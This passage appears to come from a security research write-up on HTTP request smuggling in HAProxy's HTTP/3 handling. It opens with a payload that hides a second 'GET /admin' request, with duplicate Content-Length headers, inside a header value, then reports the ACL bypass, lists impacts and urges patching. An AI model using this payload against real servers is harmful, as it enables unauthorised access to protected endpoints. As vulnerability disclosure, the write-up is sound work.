"foo":"bar \r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Lenght: 1\r\nContent-Length: 40\r\n\r\n"Below is the request that successfully bypasses the ACL restriction in HAProxy and retrieves the response from the smuggled request:

Finally, the /admin endpoint was reached, and the corresponding response was captured.

Hello, pepega Admin! This is a protected route. H3.X HTTP/3 ON STEROIDS/reborned!

Impact

The HTTP/3 implementation flaw in HAProxy allows attackers to send malformed headers that bypass security checks and are forwarded to backend servers. This enables HTTP request smuggling attacks that can:

- Bypass access controls, allowing unauthorized access to restricted routes.

- Cause unexpected behavior in backend applications, leading to potential data leakage or corruption.

- Access sensitive data or internal endpoints.

- Cause denial of service by confusing downstream servers.

- Hijack ongoing user sessions.

- Poison caches to serve malicious content to users.

- Execute unauthorized actions on behalf of legitimate users.

Conclusion

This research highlights a critical vulnerability in HAProxy’s HTTP/3 implementation that enables HTTP request smuggling through malformed headers. The flaw allows attackers to bypass security controls, inject unauthorized requests, and cause significant security and operational risks. Due to the widespread use of HAProxy in modern web infrastructure, timely patching and awareness are essential to prevent potential exploitation. Proper validation of HTTP/3 headers and adherence to RFC specifications are crucial to mitigating such vulnerabilities and ensuring secure request handling.